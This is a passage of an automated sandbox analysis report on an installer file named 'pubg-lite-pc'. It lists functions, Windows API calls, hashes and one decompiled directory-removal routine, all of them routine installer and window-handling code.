                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$AllocateExceptionHeapObjectRaiseSingleWait
                                                                                                • String ID: *.*$.jar$.pack
                                                                                                • API String ID: 2917691982-3892993289
                                                                                                • Opcode ID: 6c67da18aba89444c05f151def63f8d7aa983f2cc6db9232fb6a9a3a9310925b
                                                                                                • Instruction ID: f7be416da7ce03989c04250b2a236e68f9556428928125819809aa5a7faf81b8
                                                                                                • Opcode Fuzzy Hash: 6c67da18aba89444c05f151def63f8d7aa983f2cc6db9232fb6a9a3a9310925b
                                                                                                • Instruction Fuzzy Hash: 6E519170A00656DBDB11DFA9C848BAEB7B8FF44320F104669E425E7291DB35DD05CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00990AE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000011,?,?,?,00000010,?,?,?,00000000,00A7A358,000000FF), ref: 00990C88
                                                                                                • SHGetMalloc.SHELL32(?), ref: 00990CB1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: FolderLocationMallocSpecial
                                                                                                • String ID: C:\$C:\FAKE_DIR\
                                                                                                • API String ID: 531188275-2055520131
                                                                                                • Opcode ID: 7f316d5874482da22618f43e466ef86b3e6f6a6c12ba1b34fbd572476772c445
                                                                                                • Instruction ID: e0f07bbc7a8708a185fb157498bd4ce87165c06ec1dfadd59b44e1d131eda507
                                                                                                • Opcode Fuzzy Hash: 7f316d5874482da22618f43e466ef86b3e6f6a6c12ba1b34fbd572476772c445
                                                                                                • Instruction Fuzzy Hash: AD6173B1500749EFEB20DF64CD45BDABBF8FF08704F108519E959AB291D7B1AA04DB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009670D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 009295F0: GetTempPathW.KERNEL32(00000104,?,F4D3B90A,?), ref: 009296D1
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0096711B
                                                                                                • PathFileExistsW.SHLWAPI(00000000,?,00000000,?), ref: 0096719C
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 009671D2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Path$CreateCurrentDirectoryExistsFileProcessTemp
                                                                                                • String ID: AI_EXTUI_BIN_
                                                                                                • API String ID: 28041176-1897379104
                                                                                                • Opcode ID: 565d5dd7a35852053791997981b828909760bbaed6e44a52032606e7498b4494
                                                                                                • Instruction ID: cf10bb816724fc9c6fea1fc6c50cdb231ecec7a43cc0fec6392cd3ab4781bb33
                                                                                                • Opcode Fuzzy Hash: 565d5dd7a35852053791997981b828909760bbaed6e44a52032606e7498b4494
                                                                                                • Instruction Fuzzy Hash: EB41DD71D18288DFCB14DBE4CD45BDEBBB8BF55318F004199E016AB292EF345A05CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00964580 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(762A9610,F4D3B90A,762A9610), ref: 009645C1
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 009645D1
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 009645F7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                • String ID: @,w
                                                                                                • API String ID: 2351996187-1809401727
                                                                                                • Opcode ID: 8a4805906334b77b7020aaffe56efae4800a76b927916fb02252e4e9e44c5762
                                                                                                • Instruction ID: e12be466992345663694762ad8e7a2a88db358ddfd628176be4f6cc78a0963d5
                                                                                                • Opcode Fuzzy Hash: 8a4805906334b77b7020aaffe56efae4800a76b927916fb02252e4e9e44c5762
                                                                                                • Instruction Fuzzy Hash: F241DF71A00206AFDB10CF98C941BAAF7A8FB45310F10862AE816C7381DB31ED54CBD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00931210 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00931246
                                                                                                • EnterCriticalSection.KERNEL32(00B0380C), ref: 00931266
                                                                                                • LeaveCriticalSection.KERNEL32(00B0380C), ref: 0093128A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                • String ID: @,w
                                                                                                • API String ID: 2351996187-1809401727
                                                                                                • Opcode ID: 97a88dd8274af32744c2dd24b12513b98c1339a3ff8b1c21f8c61c430487cf29
                                                                                                • Instruction ID: af2f862597357333ca68364469ada992fedc46894af87b71477fe4b5e226c8fa
                                                                                                • Opcode Fuzzy Hash: 97a88dd8274af32744c2dd24b12513b98c1339a3ff8b1c21f8c61c430487cf29
                                                                                                • Instruction Fuzzy Hash: 6E219C71904748AFD710CF98D945B9ABBF8FB08B20F10866AE825D7790DBB5A904CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D982BF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 70%
                                                                                                			E6D982BF0(void* __edx, void* __edi, void* __esi) {
				void* _v8;
				void* _v12;
				void* _v16;
				WCHAR* _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v48;
				struct _WIN32_FIND_DATAW _v616;
				void* _v620;
				intOrPtr _v624;
				void* _v668;
				char _v676;
				char _v680;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				signed int _t52;
				WCHAR* _t55;
				signed int _t62;
				signed int _t63;
				signed int _t69;
				signed int* _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr* _t77;
				signed int _t90;
				signed int _t96;
				signed int _t97;
				signed int _t99;
				WCHAR** _t101;
				WCHAR** _t104;
				intOrPtr _t105;
				signed int _t110;
				void* _t121;
				intOrPtr _t123;
				WCHAR** _t126;
				WCHAR* _t128;
				WCHAR* _t131;
				short* _t132;
				signed int _t134;
				signed int _t136;
				signed int _t137;

				_t124 = __edi;
				_push(0xffffffff);
				_push(E6D9B6D9D);
				_push( *[fs:0x0]);
				_push(_t101);
				_push(_t96);
				_t52 =  *0x6d9e5024; // 0xe85bfa76
				_push(_t52 ^ _t133);
				 *[fs:0x0] =  &_v16;
				_t126 = _t101;
				_t55 =  *_t126;
				if( *((intOrPtr*)(_t55 - 0xc)) < 0x104) {
					L7:
					_t97 = _t96 & 0xffffff00 | RemoveDirectoryW( *_t126) == 0x00000001;
					goto L8;
				} else {
					L30();
					if(_t55 != 0) {
						goto L7;
					} else {
						_t104 = L6D966B50();
						if(_t104 == 0) {
							E6D966820(0x80004005);
							asm("int3");
							_t134 = _t136;
							_push(0xffffffff);
							_push(0x6d9b90a0);
							_push( *[fs:0x0]);
							_t137 = _t136 - 0x25c;
							_t62 =  *0x6d9e5024; // 0xe85bfa76
							_t63 = _t62 ^ _t134;
							_v616.cAlternateFileName = _t63;
							_push(_t126);
							_push(_t63);
							_t64 =  &_v48;
							 *[fs:0x0] =  &_v48;
							_t128 =  *_t104;
							_t105 =  *((intOrPtr*)(_t128 - 0xc));
							if(_t105 != 0) {
								if(_t105 < 2) {
									L27:
									goto L28;
								} else {
									if(_t105 < 0) {
										L29:
										E6D966820(0x80070057);
										asm("int3");
										_push(_t134);
										_push(0xffffffff);
										_push(0x6d9b90e5);
										_push( *[fs:0x0]);
										_push(_t105);
										_push(_t96);
										_t69 =  *0x6d9e5024; // 0xe85bfa76
										_push(_t69 ^ _t137);
										 *[fs:0x0] =  &_v676;
										_push(4);
										_t73 = L6D97E150(_t96, _t124,  &_v680, 0);
										_v668 = 0;
										_t110 = L"\\\\?\\";
										_t74 =  *_t73;
										while(1) {
											_t121 =  *_t74;
											if(_t121 !=  *_t110) {
												break;
											}
											if(_t121 == 0) {
												L35:
												_t75 = 0;
											} else {
												_t123 =  *((intOrPtr*)(_t74 + 2));
												if(_t123 !=  *((intOrPtr*)(_t110 + 2))) {
													break;
												} else {
													_t74 = _t74 + 4;
													_t110 = _t110 + 4;
													if(_t123 != 0) {
														continue;
													} else {
														goto L35;
													}
												}
											}
											L37:
											_t99 = _t96 & 0xffffff00 | _t75 == 0x00000000;
											_v16 = 0xffffffff;
											_t77 = _v28 + 0xfffffff0;
											asm("lock xadd [eax+0xc], ecx");
											if((_t110 | 0xffffffff) - 1 <= 0) {
												 *((intOrPtr*)( *((intOrPtr*)( *_t77)) + 4))(_t77);
											}
											 *[fs:0x0] = _v24;
											return _t99;
											goto L40;
										}
										asm("sbb eax, eax");
										_t75 = _t74 | 0x00000001;
										goto L37;
									} else {
										if( *_t128 != 0x5c) {
											if(_t105 < 1) {
												goto L29;
											} else {
												goto L21;
											}
										} else {
											if(_t105 < 1) {
												goto L29;
											} else {
												if(_t128[1] != 0x5c) {
													L21:
													if(_t128[1] != 0x3a) {
														goto L27;
													} else {
														goto L22;
													}
												} else {
													L22:
													L6D98C450(_t124,  &_v616, 0, 0x250);
													_t64 = FindFirstFileW(_t128,  &_v616); // executed
													_v624 = 0x6d9c8100;
													_v620 = _t64;
													_v12 = 0;
													if(_t64 == 0xffffffff) {
														GetLastError();
														_v12 = 0xffffffff;
														_v624 = 0x6d9c8100;
														_t64 = FindClose(0xffffffff);
														_v620 = 0;
													} else {
														_v12 = 0xffffffff;
														_v624 = 0x6d9c8100;
														if(_t64 != 0) {
															_t64 = FindClose(_t64);
															_v620 = 0;
														}
													}
												}
												goto L28;
											}
										}
									}
								}
							} else {
								L28:
								 *[fs:0x0] = _v20;
								return L6D98A13F(_v24 ^ _t134);
							}
						} else {
							_v20 = ( *_t104)[6]() + 0x10;
							_v8 = 0;
							if(L6D967E50( &_v20, __edx, L"\\\\?\\") == 0) {
								L6D9666D0(_t96,  &_v20, __edi, _t126, L"\\\\?\\", 4);
							}
							_v8 = 1;
							L6D966370(_t96,  &_v20,  *_t126,  *((intOrPtr*)( *_t126 - 0xc)));
							_t131 = _v20;
							_t90 = RemoveDirectoryW(_t131);
							_t97 = _t96 & 0xffffff00 | _t90 == 0x00000001;
							_v8 = 0xffffffff;
							_t132 =  &(_t131[0xfffffffffffffff8]);
							asm("lock xadd [esi+0xc], eax");
							if((_t90 | 0xffffffff) - 1 <= 0) {
								 *((intOrPtr*)( *( *_t132) + 4))(_t132);
							}
							L8:
							if(_t97 == 0) {
								GetLastError();
							}
							 *[fs:0x0] = _v16;
							return _t97;
						}
					}
				}
				L40:
			}













































                                                                                                0x6d982bf0
                                                                                                0x6d982bf3
                                                                                                0x6d982bf5
                                                                                                0x6d982c00
                                                                                                0x6d982c01
                                                                                                0x6d982c02
                                                                                                0x6d982c04
                                                                                                0x6d982c0b
                                                                                                0x6d982c0f
                                                                                                0x6d982c15
                                                                                                0x6d982c17
                                                                                                0x6d982c20
                                                                                                0x6d982cba
                                                                                                0x6d982cc5
                                                                                                0x00000000
                                                                                                0x6d982c26
                                                                                                0x6d982c26
                                                                                                0x6d982c2d
                                                                                                0x00000000
                                                                                                0x6d982c33
                                                                                                0x6d982c38
                                                                                                0x6d982c3c
                                                                                                0x6d982cea
                                                                                                0x6d982cef
                                                                                                0x6d982cf1
                                                                                                0x6d982cf3
                                                                                                0x6d982cf5
                                                                                                0x6d982d00
                                                                                                0x6d982d01
                                                                                                0x6d982d07
                                                                                                0x6d982d0c
                                                                                                0x6d982d0e
                                                                                                0x6d982d11
                                                                                                0x6d982d12
                                                                                                0x6d982d13
                                                                                                0x6d982d16
                                                                                                0x6d982d1c
                                                                                                0x6d982d1e
                                                                                                0x6d982d23
                                                                                                0x6d982d30
                                                                                                0x6d982e01
                                                                                                0x00000000
                                                                                                0x6d982d36
                                                                                                0x6d982d38
                                                                                                0x6d982e25
                                                                                                0x6d982e2a
                                                                                                0x6d982e2f
                                                                                                0x6d982e30
                                                                                                0x6d982e33
                                                                                                0x6d982e35
                                                                                                0x6d982e40
                                                                                                0x6d982e41
                                                                                                0x6d982e42
                                                                                                0x6d982e43
                                                                                                0x6d982e4a
                                                                                                0x6d982e4e
                                                                                                0x6d982e54
                                                                                                0x6d982e5c
                                                                                                0x6d982e61
                                                                                                0x6d982e68
                                                                                                0x6d982e6d
                                                                                                0x6d982e70
                                                                                                0x6d982e70
                                                                                                0x6d982e76
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d982e7b
                                                                                                0x6d982e92
                                                                                                0x6d982e92
                                                                                                0x6d982e7d
                                                                                                0x6d982e7d
                                                                                                0x6d982e85
                                                                                                0x00000000
                                                                                                0x6d982e87
                                                                                                0x6d982e87
                                                                                                0x6d982e8a
                                                                                                0x6d982e90
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d982e90
                                                                                                0x6d982e85
                                                                                                0x6d982e9b
                                                                                                0x6d982e9d
                                                                                                0x6d982ea0
                                                                                                0x6d982ead
                                                                                                0x6d982eb0
                                                                                                0x6d982eb8
                                                                                                0x6d982ebf
                                                                                                0x6d982ebf
                                                                                                0x6d982ec7
                                                                                                0x6d982ed3
                                                                                                0x00000000
                                                                                                0x6d982ed3
                                                                                                0x6d982e96
                                                                                                0x6d982e98
                                                                                                0x00000000
                                                                                                0x6d982d3e
                                                                                                0x6d982d42
                                                                                                0x6d982d59
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d982d44
                                                                                                0x6d982d47
                                                                                                0x00000000
                                                                                                0x6d982d4d
                                                                                                0x6d982d52
                                                                                                0x6d982d5f
                                                                                                0x6d982d64
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d982d54
                                                                                                0x6d982d6a
                                                                                                0x6d982d78
                                                                                                0x6d982d88
                                                                                                0x6d982d8e
                                                                                                0x6d982d98
                                                                                                0x6d982d9e
                                                                                                0x6d982da8
                                                                                                0x6d982dd4
                                                                                                0x6d982ddc
                                                                                                0x6d982de5
                                                                                                0x6d982def
                                                                                                0x6d982df5
                                                                                                0x6d982daa
                                                                                                0x6d982daa
                                                                                                0x6d982db1
                                                                                                0x6d982dbd
                                                                                                0x6d982dc0
                                                                                                0x6d982dc6
                                                                                                0x6d982dc6
                                                                                                0x6d982dd0
                                                                                                0x6d982da8
                                                                                                0x00000000
                                                                                                0x6d982d52
                                                                                                0x6d982d47
                                                                                                0x6d982d42
                                                                                                0x6d982d38
                                                                                                0x6d982d25
                                                                                                0x6d982e06
                                                                                                0x6d982e0e
                                                                                                0x6d982e24
                                                                                                0x6d982e24
                                                                                                0x6d982c42
                                                                                                0x6d982c4a
                                                                                                0x6d982c4d
                                                                                                0x6d982c63
                                                                                                0x6d982c6f
                                                                                                0x6d982c6f
                                                                                                0x6d982c74
                                                                                                0x6d982c84
                                                                                                0x6d982c89
                                                                                                0x6d982c8d
                                                                                                0x6d982c96
                                                                                                0x6d982c99
                                                                                                0x6d982ca0
                                                                                                0x6d982ca6
                                                                                                0x6d982cae
                                                                                                0x6d982cb5
                                                                                                0x6d982cb5
                                                                                                0x6d982cc8
                                                                                                0x6d982cca
                                                                                                0x6d982ccc
                                                                                                0x6d982ccc
                                                                                                0x6d982cd7
                                                                                                0x6d982ce4
                                                                                                0x6d982ce4
                                                                                                0x6d982c3c
                                                                                                0x6d982c2d
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RemoveDirectoryW.KERNEL32(?,00000000,?,\\?\,?,6D9833C0), ref: 6D982C8D
                                                                                                • RemoveDirectoryW.KERNEL32(?,E85BFA76,00000000,?,?,00000000,6D9B6D9D,000000FF,?,6D9833C0), ref: 6D982CBC
                                                                                                • GetLastError.KERNEL32(?,6D9833C0), ref: 6D982CCC
                                                                                                  • Part of subcall function 6D966B50: GetProcessHeap.KERNEL32 ref: 6D966BAC
                                                                                                  • Part of subcall function 6D967E50: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,?,6D9834C5,-00000010), ref: 6D967E88
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: DirectoryRemove$ErrorFindHeapLastProcessResource
                                                                                                • String ID: \\?\
                                                                                                • API String ID: 3015187585-4282027825
                                                                                                • Opcode ID: 661ec2f96c2f6ad6a003b593f8359b1c4e89288c68f68d5e5db688bc5a4fa915
                                                                                                • Instruction ID: f75bcd54660fe0a8098d66b7e1a851e2338d8779646d768c6bd11f9c62ae39ff
                                                                                                • Opcode Fuzzy Hash: 661ec2f96c2f6ad6a003b593f8359b1c4e89288c68f68d5e5db688bc5a4fa915
                                                                                                • Instruction Fuzzy Hash: 6D21EF31808205DFEB10DFA8C848BBEB7B8FF05324F114A99EA61D7291DB35D804CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009E0F70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,009DF189,00000000,F4D3B90A,?,00000000,F4D3B90A,?,?), ref: 009E0F84
                                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,009DF189,00000000,F4D3B90A,?,00000000,F4D3B90A,?,?), ref: 009E0FA1
                                                                                                • GetLastError.KERNEL32(009DF189,00000000,F4D3B90A,?,00000000,F4D3B90A,?,?), ref: 009E1000
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateEvent$ErrorLast
                                                                                                • String ID: AdvancedInstaller
                                                                                                • API String ID: 1131763895-1372594473
                                                                                                • Opcode ID: 96815a048832732c9d7beddfcc1c28ef4dd0ace0c6d00d2d4027b69e86bd18fd
                                                                                                • Instruction ID: cc8ebb94d45251c5bd4bd8454c2b02f1cea70d6fa29ece692f7631a3ea922d1e
                                                                                                • Opcode Fuzzy Hash: 96815a048832732c9d7beddfcc1c28ef4dd0ace0c6d00d2d4027b69e86bd18fd
                                                                                                • Instruction Fuzzy Hash: 29114C31340642BFD725DB66DC89F56BBA8BB88705F104815F2059B690DBB1FC91CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00998EB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(?,STATIC,?,0096CB78,?,80000000,00000000,00000000,0096CB78,00000064,00000000), ref: 00998F0A
                                                                                                • SendMessageW.USER32(0096CB78,00000031,00000000,00000000), ref: 00998F1F
                                                                                                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00998F27
                                                                                                  • Part of subcall function 0092F630: SetWindowLongW.USER32(?,000000FC,00000000), ref: 0092F666
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow$CreateLong
                                                                                                • String ID: STATIC
                                                                                                • API String ID: 4015368215-1882779555
                                                                                                • Opcode ID: a180e83ae3be184f6be16d4053cdd2c2321e633c396c5e96b0d9362f33ee4a40
                                                                                                • Instruction ID: d71febd9f1f06c94286dd30925a00da941c74de70ab3dd3a0c7639334d9e8ba5
                                                                                                • Opcode Fuzzy Hash: a180e83ae3be184f6be16d4053cdd2c2321e633c396c5e96b0d9362f33ee4a40
                                                                                                • Instruction Fuzzy Hash: 4E114875204314AFD6119F59DC84F6BFBAEFB89B50F054619FA0497291C771AC05CAA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00999090 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00999220: GetProcAddress.KERNEL32(SetWindowTheme), ref: 009992ED
                                                                                                  • Part of subcall function 00999220: SendMessageW.USER32(46B30035,0000112C,00000004,00000004), ref: 00999329
                                                                                                • CreateWindowExW.USER32(80000000,SysTreeView32,?,00000000,?,80000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009990E2
                                                                                                • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00999100
                                                                                                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00999108
                                                                                                  • Part of subcall function 0092F630: SetWindowLongW.USER32(?,000000FC,00000000), ref: 0092F666
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$AddressCreateLongProc
                                                                                                • String ID: SysTreeView32
                                                                                                • API String ID: 5470851-1698111956
                                                                                                • Opcode ID: 4d8aa1bd816497c0532964f86287c6a434cd49c4a0a89837d7c2516e5bb2e0a9
                                                                                                • Instruction ID: a8be759a7b7283eae7b8b2bd523dd8f699a6e369c3096f87b676c9d71cb80a03
                                                                                                • Opcode Fuzzy Hash: 4d8aa1bd816497c0532964f86287c6a434cd49c4a0a89837d7c2516e5bb2e0a9
                                                                                                • Instruction Fuzzy Hash: 71113C35340314BFD6259F55DC09F5BFBAAFBC9B50F054619FA04AB2A1C7B1A900CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009958A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00996450: GetProcAddress.KERNEL32(SetWindowTheme), ref: 0099651D
                                                                                                  • Part of subcall function 00996450: SendMessageW.USER32(000000EF,00001036,00010000,00010000), ref: 0099655F
                                                                                                • CreateWindowExW.USER32(80000000,SysListView32,?,00000000,00000000,80000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009958F2
